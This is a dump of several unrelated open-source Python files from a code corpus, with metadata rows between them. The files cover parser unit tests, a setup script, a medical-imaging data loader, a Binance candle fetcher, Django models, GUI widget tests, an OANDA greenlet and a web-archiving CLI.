msg = self.app.print_stack.pop()
expected = "I understood as far as"
self.assertIn(
expected,
msg,
"Unexpected response attempting to disambiguate verb with unrecognized "
"noun.",
)
def test_verb_by_objects_no_near_matches_unrecognized_noun(self):
sarah1 = Actor(self.game, "teacher")
sarah1.setAdjectives(["good"])
self.start_room.addThing(sarah1)
sarah2 = Actor(self.game, "teacher")
sarah2.setAdjectives(["bad"])
self.start_room.addThing(sarah2)
self.game.turnMain("hi teacher")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("set green sarah")
msg = self.app.print_stack.pop()
expected = "I understood as far as"
self.assertIn(
expected,
msg,
"Unexpected response attempting to disambiguate verb with unrecognized "
"noun.",
)
class TestCompositeObjectRedirection(IFPTestCase):
def test_composite_object_redirection(self):
bench = Surface(self.game, "bench")
self.start_room.addThing(bench)
underbench = UnderSpace(self.game, "space")
bench.addComposite(underbench)
widget = Thing(self.game, "widget")
underbench.addThing(widget)
self.game.turnMain("look under bench")
msg = self.app.print_stack.pop()
self.assertIn(
widget.verbose_name,
msg,
"Unexpected response attempting to use a component redirection",
)
class TestDisambig(IFPTestCase):
def test_disambiguate_with_directional_adjective(self):
east_pillar = Thing(self.game, "pillar")
east_pillar.setAdjectives(["east"])
west_pillar = Thing(self.game, "pillar")
west_pillar.setAdjectives(["west"])
self.start_room.addThing(east_pillar)
self.start_room.addThing(west_pillar)
self.game.turnMain("x pillar")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("east")
self.assertIs(
self.game.parser.command.dobj.target,
east_pillar,
"Unexpected direct object after attempting to disambiguate with direction "
"adjective",
)
def test_disambiguate_with_index(self):
east_pillar = Thing(self.game, "pillar")
east_pillar.setAdjectives(["east"])
west_pillar = Thing(self.game, "pillar")
west_pillar.setAdjectives(["west"])
self.start_room.addThing(east_pillar)
self.start_room.addThing(west_pillar)
self.game.turnMain("x pillar")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("1")
self.assertIn(
self.game.parser.command.dobj.target,
[east_pillar, west_pillar],
"Unexpected direct object after attempting to disambiguate with index",
)
class TestPrepositions(IFPTestCase):
def test_prepositional_adjectives(self):
up_ladder = Thing(self.game, self._get_unique_noun())
up_ladder.setAdjectives(["high", "up"])
self.start_room.addThing(up_ladder)
self.game.turnMain(f"x up high {up_ladder.name}")
self.assertIs(
self.game.parser.command.verb,
ExamineVerb,
"Unexpected verb after using a preposition as an adjective",
)
self.assertIs(
self.game.parser.command.dobj.target,
up_ladder,
"Unexpected dobj after using a preposition as an adjective",
)
def test_verb_rejected_if_preposition_not_accounted_for(self):
up_ladder = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(up_ladder)
self.game.turnMain(f"x up big {up_ladder.name}")
self.assertIsNot(
self.game.parser.command.verb,
ExamineVerb,
"Examine verb does not have preposition `up`. Should not have matched.",
)
def test_preposition_directional_verb(self):
girl = Thing(self.game, "girl")
self.start_room.addThing(girl)
self.game.turnMain(f"lead girl up")
self.assertIs(
self.game.parser.command.verb,
LeadDirVerb,
"Unexpected verb after using a direction that doubles as a preposition (up) "
"for a directional verb",
)
class TestKeywords(IFPTestCase):
def test_keyword_adjectives(self):
everything_box = Thing(self.game, self._get_unique_noun())
everything_box.setAdjectives(["good", "everything"])
self.start_room.addThing(everything_box)
self.game.turnMain(f"x everything good {everything_box.name}")
self.assertIs(
self.game.parser.command.verb,
ExamineVerb,
"Unexpected verb after using an english keyword as an adjective",
)
self.assertIs(
self.game.parser.command.dobj.target,
everything_box,
"Unexpected dobj after using an english keyword as an adjective",
)
def test_verb_rejected_if_keyword_not_accounted_for(self):
everything_box = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(everything_box)
self.game.turnMain(f"x everything good {everything_box.name}")
self.assertIsNot(
self.game.parser.command.verb,
ExamineVerb,
"Examine verb does not have keyword `everything`. Should not have matched.",
)
def test_verb_with_keyword(self):
self.game.turnMain("take all")
self.assertIs(
self.game.parser.command.verb,
GetAllVerb,
"Tried to call a verb with an english keyword.",
)
class TestSuggestions(IFPTestCase):
def test_accept_suggestion(self):
girl = Actor(self.game, "girl")
TOPIC_SUGGESTION = "ask what her name is"
TOPIC_TEXT = '"It\'s Karen," says the girl.'
topic = SpecialTopic(self.game, TOPIC_SUGGESTION, TOPIC_TEXT)
girl.addSpecialTopic(topic)
self.start_room.addThing(girl)
self.game.turnMain("talk to girl")
self.assertTrue(self.game.parser.command.specialTopics)
self.game.turnMain(TOPIC_SUGGESTION)
msg = self.app.print_stack.pop(-2)
self.assertEqual(
msg, TOPIC_TEXT, "Expected topic text to print after accepting suggestion"
)
class TestReplacement(IFPTestCase):
STRING = "this one here is improbable to find elsewhere"
INTEGER = 77
@classmethod
def class_method_with_one_arg(cls, ret):
return ret
def test_print_replace_with_string(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = "I will <<test_parser.TestReplacement.STRING>> this."
thing.moveTo(self.start_room)
self.game.turnMain(f"x {thing.name}")
msg = self.app.print_stack.pop()
self.assertIn(self.STRING, msg)
def test_print_replace_with_integer(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = "I will <<test_parser.TestReplacement.INTEGER>> this."
thing.moveTo(self.start_room)
self.game.turnMain(f"x {thing.name}")
msg = self.app.print_stack.pop()
self.assertIn(str(self.INTEGER), msg)
def test_attempting_to_replace_with_function_call_raises(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = (
"I will <<test_parser.TestReplacement.class_method_with_one_arg(7)>> this."
)
thing.moveTo(self.start_room)
with self.assertRaises(NotImplementedError):
self.game.turnMain(f"x {thing.name}")
| 32.414097
| 89
| 0.647323
| 14,251
| 0.968402
| 0
| 0
| 76
| 0.005164
| 0
| 0
| 3,058
| 0.207801
|
bb6dc22e8ea52200d58eae5889b340543ca4b618
| 51
|
py
|
Python
|
spacy_thai/__init__.py
|
KoichiYasuoka/spaCy-Thai
|
e70aedbd3c8c88e317a4c254d91b3d4151655d1d
|
[
"MIT"
] | 15
|
2020-09-26T20:59:12.000Z
|
2022-03-10T05:14:53.000Z
|
spacy_thai/__init__.py
|
KoichiYasuoka/spaCy-Thai
|
e70aedbd3c8c88e317a4c254d91b3d4151655d1d
|
[
"MIT"
] | 4
|
2020-12-13T18:58:08.000Z
|
2022-02-21T01:07:37.000Z
|
spacy_thai/__init__.py
|
KoichiYasuoka/spaCy-Thai
|
e70aedbd3c8c88e317a4c254d91b3d4151655d1d
|
[
"MIT"
] | 3
|
2020-09-27T11:25:42.000Z
|
2021-05-13T08:48:03.000Z
|
from .spacy_thai import ThaiTagger,ThaiParser,load
| 25.5
| 50
| 0.862745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
bb6e51b991925d3f2d075e10b6faa76829b92e27
| 965
|
py
|
Python
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | 1
|
2021-11-04T18:38:43.000Z
|
2021-11-04T18:38:43.000Z
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
import setuptools
import re
with open("README.md", "r") as fh:
long_description = fh.read()
version = ''
with open('pydisfish/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('version is not set')
requirements = []
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setuptools.setup(
name='pydisfish',
version=version,
author='kajdev',
description="A small module to easily interact with discord's phishing domain list.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/kajdev/pydisfish",
packages=["pydisfish"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=requirements
)
| 28.382353
| 99
| 0.65285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 385
| 0.398964
|
bb70059c996805e1f7f560d971daa768591ddbce
| 9,173
|
py
|
Python
|
backup/data_bk.py
|
ieee820/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 157
|
2018-09-22T20:45:04.000Z
|
2022-01-24T13:08:09.000Z
|
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | null | null | null |
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 53
|
2018-10-09T09:34:15.000Z
|
2021-08-14T10:24:43.000Z
|
import sys
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
import os
import math
import multiprocessing as mp
import threading
import torch
from torch.utils.data import Dataset
import numpy as np
from data_utils import get_receptive_field, get_sub_patch_shape, \
get_offset, sample_coords, get_all_coords, nib_load
PATCH_SHAPE = (25, 25, 25)
KERNELS = ((3, 3, 3), )*8
SCALE_FACTOR = (3, 3, 3)
SHAPE = [240, 240, 155]
np.random.seed(2017)
mean = [433.78412444, 661.42844749, 588.09469198, 651.22305233]
mean = np.array(mean).reshape(4, 1, 1, 1)
std = [1343.81579289, 1200.61193295, 1178.99769383, 1390.22978543]
std = np.array(std).reshape(4, 1, 1, 1)
class ImageList(Dataset):
def __init__(self,
list_file,
patch_shape=PATCH_SHAPE,
kernels=KERNELS,
scale_factor=SCALE_FACTOR,
root='',
split='valid',
sample_size=20):
names = []
with open(list_file) as f:
for line in f:
line = line.strip()
name = line.split('/')[-1]
path = os.path.join(root, line , name + '_')
names.append(path)
self.root = root
self.names = names
self.split = split
self.sample_size = sample_size
self.receptive_field = get_receptive_field(kernels)
self.patch_shape = np.array(patch_shape)
self.scale_factor = np.array(scale_factor)
self.sub_patch_shape = get_sub_patch_shape(self.patch_shape,
self.receptive_field, self.scale_factor)
self.sub_off = get_offset(self.scale_factor, self.receptive_field)
self.modalities = ('flair', 't1ce', 't1', 't2')
self.C = len(self.modalities)
def coord_to_slice(self, coord):
return coord[:, 0], coord[:, 1] + 1
def coord_to_sub_slice(self, coord):
lo = coord[:, 0] + self.sub_off
num = self.patch_shape - self.receptive_field + 1
hi = lo + self.scale_factor*self.receptive_field + \
np.ceil((num*1.0)/self.scale_factor - 1) * self.scale_factor
hi = hi.astype('int')
lo = lo.astype('int')
m = lo < 0
pl = -lo * m
lo[lo < 0] = 0
m = hi > SHAPE
ph = (hi - SHAPE) * m
hi += pl.astype('int')
pad = list(zip(pl, ph))
return lo, hi, pad
def crop(self, coords, images, label):
N = coords.shape[0]
samples = np.zeros((N, self.C) + tuple(self.patch_shape), dtype='float32')
sub_samples = np.zeros((N, self.C) + tuple(self.sub_patch_shape), dtype='float32')
labels = np.zeros((N,) + (9, 9, 9), dtype='int')
size = (self.sub_patch_shape - 1)//2
gl = (self.patch_shape - size)//2
gh = self.patch_shape - gl
kx, ky, kz = self.scale_factor
for n, coord in enumerate(coords):
ss, ee = self.coord_to_slice(coord)
lo, hi, pad = self.coord_to_sub_slice(coord)
cropped_label = label[ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
labels[n] = cropped_label[gl[0]:gh[0], gl[1]:gh[1], gl[2]:gh[2]]
samples[n] = images[:, ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
pimages = np.pad(images, [(0, 0)] + pad, mode='constant') \
if np.sum(pad) > 0 else images
sub_samples[n] = \
pimages[:, lo[0]:hi[0]:kx, lo[1]:hi[1]:ky, lo[2]:hi[2]:kz]
samples = samples - mean
samples = samples / std
sub_samples = sub_samples - mean
sub_samples = sub_samples/std
return samples, sub_samples, labels
def __call__(self, index):
return self.__getitem__(index)
def __getitem__(self, index):
path = self.names[index]
start = time.time()
images = np.array([
nib_load(path + modal + '.nii.gz') \
for modal in self.modalities])
t1 = time.time() - start
start = time.time()
mask = images.sum(0) > 0
#images -= mean * mask
#images /= std
label_file = path + 'seg.nii.gz'
label = nib_load(label_file)
exit(0)
n = self.sample_size
if self.split == 'train':
fg = (label > 0).astype('int32')
bg = ((mask > 0) * (fg == 0)).astype('int32')
coords = np.concatenate(
[sample_coords(n/2, self.patch_shape, weight) for weight in (fg, bg)])
elif self.split == 'valid':
coords = sample_coords(n, self.patch_shape, mask)
else: # test
coords = get_all_coords((9, 9, 9), self.patch_shape, SHAPE, 15)
t2 = time.time() - start
start = time.time()
samples, sub_samples, labels = self.crop(coords, images, label)
t3 = time.time() - start
msg = 'read {}, sample {}, crop {}, total {}'.format(t1, t2, t3, t1 + t2 + t3)
print(msg)
#print(t1, t2, t3, t1+t2+t3)
# 2.3 sec total
#exit(0)
return samples, sub_samples, labels, coords
def __len__(self):
return len(self.names)
@staticmethod
def collate(batch):
data = [torch.cat([torch.from_numpy(t) for t in v]) for v in zip(*batch)]
perm = torch.randperm(data[0].shape[0])
return [t[perm] for t in data]
class PEDataLoader(object):
"""
A multiprocess-dataloader that parallels over elements as suppose to
over batches (the torch built-in one)
Input dataset must be callable with index argument: dataset(index)
https://github.com/thuyen/nnet/blob/master/pedataloader.py
"""
def __init__(self, dataset, batch_size=1, shuffle=False,
num_workers=None, pin_memory=False, num_batches=None):
self.dataset = dataset
self.batch_size = batch_size
self.shuffle = shuffle
self.num_workers = num_workers
self.collate_fn = collate
self.pin_memory_fn = \
torch.utils.data.dataloader.pin_memory_batch if pin_memory else \
lambda x: x
self.num_samples = len(dataset)
self.num_batches = num_batches or \
int(math.ceil(self.num_samples / float(self.batch_size)))
self.pool = mp.Pool(num_workers)
self.buffer = queue.Queue(maxsize=1)
self.start()
def generate_batches(self):
if self.shuffle:
indices = torch.LongTensor(self.batch_size)
for b in range(self.num_batches):
indices.random_(0, self.num_samples-1)
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
else:
self.indices = torch.LongTensor(range(self.num_samples))
for b in range(self.num_batches):
start_index = b*self.batch_size
end_index = (b+1)*self.batch_size if b < self.num_batches - 1 \
else self.num_samples
indices = self.indices[start_index:end_index]
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
def start(self):
def _thread():
for b in self.generate_batches():
self.buffer.put(b, block=True)
self.buffer.put(None)
thread = threading.Thread(target=_thread)
thread.daemon = True
thread.start()
def __next__(self):
batch = self.buffer.get()
if batch is None:
self.start()
raise StopIteration
return batch
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.num_batches
root = '/home/thuyen/Data/brats17/Brats17TrainingData/'
file_list = root + 'file_list.txt'
dset = ImageList(file_list, root=root)
import time
start = time.time()
for i in range(len(dset)):
dset[i]
#x1, x2, y, c = dset[0]
print(time.time() - start)
start = time.time()
exit(0)
from dataloader import DataLoader
import time
from sampler import SSampler
batch_size = 10
num_epochs = 20
num_iters = len(dset) * num_epochs // batch_size
sampler = SSampler(len(dset), num_epochs=num_epochs)
dloader = DataLoader(dset,
batch_size=batch_size, pin_memory=True, collate_fn=ImageList.collate, sampler=sampler,
#batch_size=batch_size, pin_memory=True, shuffle=True,
#num_batches = num_iters,
num_workers=20)
import torch
#a = torch.rand(10).cuda()
start = time.time()
count = 0
for k, x in enumerate(dloader):
if k == 0:
count = 0
start = time.time()
shapes = [t.shape for t in x]
print(k, str(shapes))
y = [t.cuda(non_blocking=True) for t in x]
count += 1
end = time.time()
print((end-start)/(count - 1), count)
#start = time.time()
#for x in dloader:
# end = time.time()
# print(x[0].size(), end-start)
# start = end
#
#exit(0)
# preprocess data to speedup traning and predictions
| 29.782468
| 94
| 0.578764
| 7,197
| 0.784585
| 946
| 0.103129
| 206
| 0.022457
| 0
| 0
| 887
| 0.096697
|
bb715b8832fba253f15741c5824e20ae8941000e
| 2,364
|
py
|
Python
|
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
from .utils import to_ms, to_candle
from ..api_candles import ApiCandles
from ...timeframes import Timeframes
import datetime, time
import requests as r
class BinanceApiCandles(ApiCandles):
_url = 'https://api.binance.com/api/v3/klines'
# <Timeframes> : <str - binance str repr>
_binance_intervals = {
Timeframes.M1: '1m',
Timeframes.M3: '3m',
Timeframes.M5: '5m',
Timeframes.M15: '15m',
Timeframes.M30: '30m',
Timeframes.H1: '1h',
Timeframes.H2: '2h',
Timeframes.H4: '4h',
Timeframes.D1: '1d',
Timeframes.W1: '1w'
}
def __init__(self, ticker: str, timeframe_tag: Timeframes):
try:
self._interval = self._binance_intervals[timeframe_tag]
except KeyError:
allowed = list(self._binance_intervals.keys())
raise ValueError(
'Binance API supports the following timeframes: {allowed}')
self._ticker = ticker
self._gen = None
super().__init__(timeframe_tag)
def _candles(self):
# Convert datetime objects to timestamp
since = to_ms(self._start_date.timestamp())
end_time = to_ms(time.time())
MAX_PER_REQUEST = 1000
max_time_step = MAX_PER_REQUEST*self.candle_duration()*1000
params = {
'symbol': self._ticker,
'interval': self._interval,
'startTime': None,
'endTime': end_time,
'limit': MAX_PER_REQUEST
}
for start_time in range(since, end_time, max_time_step):
# this requests 1k candles at a time
params['startTime'] = start_time
res = r.get(self._url, params)
res.raise_for_status()
for obj in res.json():
yield to_candle(obj, self._candle_buffer)
def current_date(self) -> datetime.datetime:
if not self._start_date:
return None
ticks = self.get_ticks()
time_passed = datetime.timedelta(
seconds=ticks*self.candle_duration())
return self._start_date + time_passed
def next(self) -> None:
if not self._gen:
self._gen = iter(self._candles())
next(self._gen)
self._tick_counter.increment()
| 31.945946
| 76
| 0.576565
| 2,200
| 0.930626
| 817
| 0.345601
| 0
| 0
| 0
| 0
| 314
| 0.132826
|
bb723206badf8174dc3f8ba35066d0a2d790ceab
| 2,110
|
py
|
Python
|
server/grading/models.py
|
jauhararifin/ugrade
|
c5bc0ce3920534cf289c739ffe8b83ceed9f52e8
|
[
"MIT"
] | 15
|
2019-02-27T19:28:23.000Z
|
2019-07-20T17:54:46.000Z
|
server/grading/models.py
|
jauhararifin/ugrade
|
c5bc0ce3920534cf289c739ffe8b83ceed9f52e8
|
[
"MIT"
] | 9
|
2020-09-04T18:30:56.000Z
|
2022-03-25T18:41:11.000Z
|
server/grading/models.py
|
jauhararifin/ugrade
|
c5bc0ce3920534cf289c739ffe8b83ceed9f52e8
|
[
"MIT"
] | 2
|
2019-03-29T14:15:47.000Z
|
2019-04-12T06:08:11.000Z
|
import os
import random
from django.db import models
from contests.models import Submission, User, Contest
VERDICT = (
('RTE', 'Run Time Error'),
('MLE', 'Memory Limit Exceeded'),
('TLE', 'Time Limit Exceeded'),
('WA', 'Wrong Answer'),
('CE', 'Compilation Error'),
('IE', 'Internal Error'),
('AC', 'Accepted'),
('PENDING', 'Pending'),
)
def spec_upload_path(instance, filename):
alphanum = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
random_str = ''.join(random.choice(alphanum) for _ in range(64))
return os.path.join("{}-{}-{}".format('gradingspec', instance.id, random_str), filename)
class GradingGroup(models.Model):
submission = models.ForeignKey(
Submission, on_delete=models.CASCADE, related_name='grading_groups')
issued_time = models.DateTimeField(auto_now_add=True)
verdict = models.CharField(
max_length=32, choices=VERDICT, default='PENDING')
finish_time = models.DateTimeField(blank=True, null=True)
# contain tcgen solution checker submission
spec = models.FileField(upload_to=spec_upload_path)
grading_size = models.IntegerField()
def __str__(self):
return "{} - Grading Group #{}".format(self.submission, self.id)
class Grading(models.Model):
# filled when inserted
grading_group = models.ForeignKey(
GradingGroup, on_delete=models.CASCADE, related_name='gradings')
# for optimization
contest = models.ForeignKey(
Contest, on_delete=models.CASCADE, related_name='gradings')
verdict = models.CharField(
max_length=32, choices=VERDICT, default='PENDING')
grader_group = models.IntegerField()
# filled when claimed
claimed_at = models.DateTimeField(blank=True, null=True)
claimed_by = models.ForeignKey(
User, null=True, blank=True, on_delete=models.SET_NULL)
# filled when finished
finish_at = models.DateTimeField(blank=True, null=True)
output = models.FileField(null=True, blank=True)
def __str__(self):
return "{} - Grading #{}".format(self.grading_group, self.id)
| 32.96875
| 92
| 0.694313
| 1,446
| 0.685308
| 0
| 0
| 0
| 0
| 0
| 0
| 479
| 0.227014
|
bb7233933506ce378e6905eadbfa9e01a8d6c38d
| 2,295
|
py
|
Python
|
enaml/tests/widgets/test_spin_box.py
|
mmckerns/enaml
|
ebf417b4dce9132bffa038a588ad90436a59d37e
|
[
"BSD-3-Clause"
] | 11
|
2015-01-04T14:29:23.000Z
|
2019-12-25T05:38:37.000Z
|
enaml/tests/widgets/test_spin_box.py
|
mmckerns/enaml
|
ebf417b4dce9132bffa038a588ad90436a59d37e
|
[
"BSD-3-Clause"
] | 36
|
2015-02-20T00:56:53.000Z
|
2020-12-04T10:02:14.000Z
|
enaml/tests/widgets/test_spin_box.py
|
mmckerns/enaml
|
ebf417b4dce9132bffa038a588ad90436a59d37e
|
[
"BSD-3-Clause"
] | 3
|
2015-11-19T15:11:37.000Z
|
2019-03-11T23:45:02.000Z
|
#------------------------------------------------------------------------------
# Copyright (c) 2012, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
from enaml.validation.api import IntValidator
from .enaml_test_case import EnamlTestCase
class TestSpinBox(EnamlTestCase):
""" Unit tests for the SpinBox widget.
"""
def setUp(self):
enaml_source = """
from enaml.widgets.api import SpinBox, Window
enamldef MainView(Window):
SpinBox:
pass
"""
self.parse_and_create(enaml_source)
self.server_widget = self.find_server_widget(self.view, "SpinBox")
self.client_widget = self.find_client_widget(self.client_view, "QtSpinBox")
def test_set_maximum(self):
""" Test the setting of a SpinBox's maximum attribute
"""
with self.app.process_events():
self.server_widget.maximum = 1000
self.assertEquals(self.client_widget.maximum(), self.server_widget.maximum)
def test_set_minimum(self):
""" Test the setting of a SpinBox's minimum attribute
"""
with self.app.process_events():
self.server_widget.minimum = 10
self.assertEquals(self.client_widget.minimum(), self.server_widget.minimum)
def test_set_single_step(self):
""" Test the setting of a SpinBox's single_step attribute
"""
with self.app.process_events():
self.server_widget.single_step = 25
self.assertEquals(self.client_widget.singleStep(), self.server_widget.single_step)
def test_set_value(self):
""" Test the setting of a SpinBox's value attribute
"""
with self.app.process_events():
self.server_widget.value = 50
self.assertEquals(self.client_widget.value(), self.server_widget.value)
def test_set_wrap(self):
""" Test the setting of a SpinBox's wrap attribute
"""
with self.app.process_events():
self.server_widget.wrapping = True
self.assertEquals(self.client_widget.wrapping(), self.server_widget.wrapping)
### Need to add tests for special_value_text, prefix, suffix and read_only
if __name__ == '__main__':
import unittest
unittest.main()
| 31.875
| 90
| 0.623094
| 1,911
| 0.83268
| 0
| 0
| 0
| 0
| 0
| 0
| 801
| 0.34902
|
bb723c07c298e3147c128f216ca171ac795e93ac
| 192
|
py
|
Python
|
src/lib/core_funcs.py
|
thekraftyman/discord-bot-starter
|
e6b9174ea346ec060ecda3f2b1d22f1eb6066f95
|
[
"MIT"
] | null | null | null |
src/lib/core_funcs.py
|
thekraftyman/discord-bot-starter
|
e6b9174ea346ec060ecda3f2b1d22f1eb6066f95
|
[
"MIT"
] | null | null | null |
src/lib/core_funcs.py
|
thekraftyman/discord-bot-starter
|
e6b9174ea346ec060ecda3f2b1d22f1eb6066f95
|
[
"MIT"
] | null | null | null |
# core_funcs.py
# By: thekraftyman
'''
container for all of the core funcs that have been distributed among files
'''
from src.lib.async_funcs import *
from src.lib.non_async_funcs import *
| 19.2
| 74
| 0.760417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 115
| 0.598958
|
bb724e768f60fb932f05a9b7ae174961837fa0fc
| 532
|
py
|
Python
|
core/models.py
|
rubberducklive/tcm_api
|
53d2b533e3f9251cce49bd4c1b8e9e65a03eaf04
|
[
"MIT"
] | null | null | null |
core/models.py
|
rubberducklive/tcm_api
|
53d2b533e3f9251cce49bd4c1b8e9e65a03eaf04
|
[
"MIT"
] | null | null | null |
core/models.py
|
rubberducklive/tcm_api
|
53d2b533e3f9251cce49bd4c1b8e9e65a03eaf04
|
[
"MIT"
] | null | null | null |
import uuid
from django.db import models
class TimeStampedModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
class Meta(object):
abstract = True
class PrimaryUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
class Meta(object):
abstract = True
class PrimaryUUIDTimeStampedModel(TimeStampedModel, PrimaryUUIDModel):
class Meta(object):
abstract = True
| 22.166667
| 79
| 0.734962
| 481
| 0.904135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
bb72f9435fdc29920b70ac72d5ae0238e0aa1869
| 1,351
|
py
|
Python
|
oandapyV20-examples-master/src/console/greenlets/accountdetails.py
|
cdibble2011/OANDA
|
68327d6d65dd92952d7a1dc49fe29efca766d900
|
[
"MIT"
] | 127
|
2017-02-28T17:34:14.000Z
|
2022-01-21T13:14:30.000Z
|
oandapyV20-examples-master/src/console/greenlets/accountdetails.py
|
cdibble2011/OANDA
|
68327d6d65dd92952d7a1dc49fe29efca766d900
|
[
"MIT"
] | 36
|
2018-06-07T21:34:13.000Z
|
2022-03-13T21:01:43.000Z
|
oandapyV20-examples-master/src/console/greenlets/accountdetails.py
|
cdibble2011/OANDA
|
68327d6d65dd92952d7a1dc49fe29efca766d900
|
[
"MIT"
] | 76
|
2017-01-02T14:15:07.000Z
|
2022-03-28T03:49:45.000Z
|
# -*- coding: utf-8 -*-
import gevent
from oandapyV20.endpoints.accounts import AccountDetails, AccountChanges
class GAccountDetails(gevent.Greenlet):
"""Greenlet to handle account details/changes.
Initially get the AccountDetails and then keep polling
for account changes.
In case of changes put those on the NAV-Queue
"""
def __init__(self, api, accountID, queue, sleepTime=4):
super(GAccountDetails, self).__init__()
self.api = api
self.accountID = accountID
self.queue = queue
self.sleepTime = sleepTime
def _run(self):
# setup the summary request
r = AccountDetails(accountID=self.accountID)
rv = self.api.request(r)
lastTransactionID = rv.get("lastTransactionID")
lastLastTransactionID = lastTransactionID
r = None
while True:
if not r or lastLastTransactionID != lastTransactionID:
params = {"sinceTransactionID":
int(rv.get("lastTransactionID"))}
r = AccountChanges(accountID=self.accountID, params=params)
lastLastTransactionID = lastTransactionID
rv = self.api.request(r)
lastTransactionID = rv.get('lastTransactionID')
self.queue.put_nowait(rv)
gevent.sleep(self.sleepTime)
| 32.95122
| 75
| 0.637306
| 1,236
| 0.914878
| 0
| 0
| 0
| 0
| 0
| 0
| 316
| 0.233901
|
bb73bd26c0031f64dbf994ec3a8a3952a7f0e16a
| 802
|
py
|
Python
|
wbsv/main.py
|
yswallow/wbsv-cli
|
30b68d0d1efd56fba99286d53470a39d317d6d9d
|
[
"MIT"
] | null | null | null |
wbsv/main.py
|
yswallow/wbsv-cli
|
30b68d0d1efd56fba99286d53470a39d317d6d9d
|
[
"MIT"
] | null | null | null |
wbsv/main.py
|
yswallow/wbsv-cli
|
30b68d0d1efd56fba99286d53470a39d317d6d9d
|
[
"MIT"
] | null | null | null |
import sys
from . import Archive
from . import Find
from . import ParseArgs
from . import Interact
def iter_urls(opt):
"""Iterate given urls for saving."""
try:
for x in opt["urls"]:
Archive.archive(Find.extract_uri_recursive(x, opt["level"]),
x, opt["retry"])
except KeyboardInterrupt:
print("[!]Interrupted!", file=sys.stderr)
print("[!]Halt.", file=sys.stderr)
exit(1)
def main():
"""Main function."""
opt = ParseArgs.parse_args()
if len(opt["urls"]) == 0:
Interact.interactive(opt)
elif opt["only-target"]:
[Archive.archive([x], x, opt["retry"]) for x in opt["urls"]]
exit(0)
else:
iter_urls(opt)
exit(0)
if __name__ == "__main__":
main()
| 20.05
| 72
| 0.557357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.180798
|
bb74b1ea7d5e069ac223adabbb64c46d9e5159e9
| 5,613
|
py
|
Python
|
Sapphire/CallStatement.py
|
Rhodolite/Parser-py
|
7743799794d92aa8560db11f1d6d5f00e5ac1925
|
[
"MIT"
] | null | null | null |
Sapphire/CallStatement.py
|
Rhodolite/Parser-py
|
7743799794d92aa8560db11f1d6d5f00e5ac1925
|
[
"MIT"
] | null | null | null |
Sapphire/CallStatement.py
|
Rhodolite/Parser-py
|
7743799794d92aa8560db11f1d6d5f00e5ac1925
|
[
"MIT"
] | null | null | null |
#
# Copyright (c) 2017-2018 Joy Diamond. All rights reserved.
#
@gem('Sapphire.CallStatement')
def gem():
require_gem('Sapphire.BookcaseExpression')
require_gem('Sapphire.MemberExpression')
require_gem('Sapphire.Method')
require_gem('Sapphire.Tree')
class CallStatementBase(SapphireTrunk):
__slots__ = ((
'frill', # VW_Frill | Commented_VW_Frill
'left', # Expression
'arguments', # Arguments*
))
class_order = CLASS_ORDER__CALL_STATEMENT
is_any_else = false
is_any_except_or_finally = false
is_else_header_or_fragment = false
is_statement_header = false
is_statement = true
def __init__(t, frill, left, arguments):
assert type(left) is not VW_Frill
t.frill = frill
t.left = left
t.arguments = arguments
def __repr__(t):
return arrange('<%s %r %r %r>', t.__class__.__name__, t.frill, t.left, t.arguments)
def add_comment(t, comment):
frill = t.frill
